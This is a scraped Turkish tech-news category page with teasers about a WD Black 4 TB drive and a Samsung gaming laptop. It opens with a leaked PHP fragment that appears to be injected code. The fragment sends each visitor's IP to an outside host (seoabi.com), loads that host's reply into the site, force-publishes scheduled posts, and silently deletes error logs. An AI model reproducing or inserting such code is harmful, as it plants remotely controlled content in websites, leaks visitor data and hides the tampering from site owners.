$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> 7200 Rpm | Teknoloji Haberleri

7200 Rpm kategorisindeki tüm yazılar

Son Yazılar

WD Black Ailesine 4 TB Kapasiteli Model Eklendi

Western Digital’in en hızlı masaüstü hard disk ailesi olan Black için 4 TB’lık seçenek eklendi. Teknik özellikler ve ürünün fiyatı haberimizde. Western Digital, bugün yüksek performanslı ve en yüksek kapasiteli masaüstü sabit sürücüsü olan WD Black 4 TB, 3.5 inç, 7200 RPM hızındaki sabit disk modelini duyurdu.

Oyun deneyimi sunan dizüstü

Samsung’un oyun tutkunlarına özel ürettiği dizüstü bilgisayarı, artık Türkiye’de! Samsung Electronics Co., Ltd, performanstan ödünvermeden daha akıllı ve zengin oyun deneyimi sunmak için tasarlanan Samsung 7 Serisi Gamer dizüstü oyun bilgisayarları Türkiye’de kullanıcılarla buluştu. Yüksek performansıyla dikkat çeken Gamer dizüstü bilgisayarlar dört çekirdekli Intel Core i7 işlemciyle çalışıyor.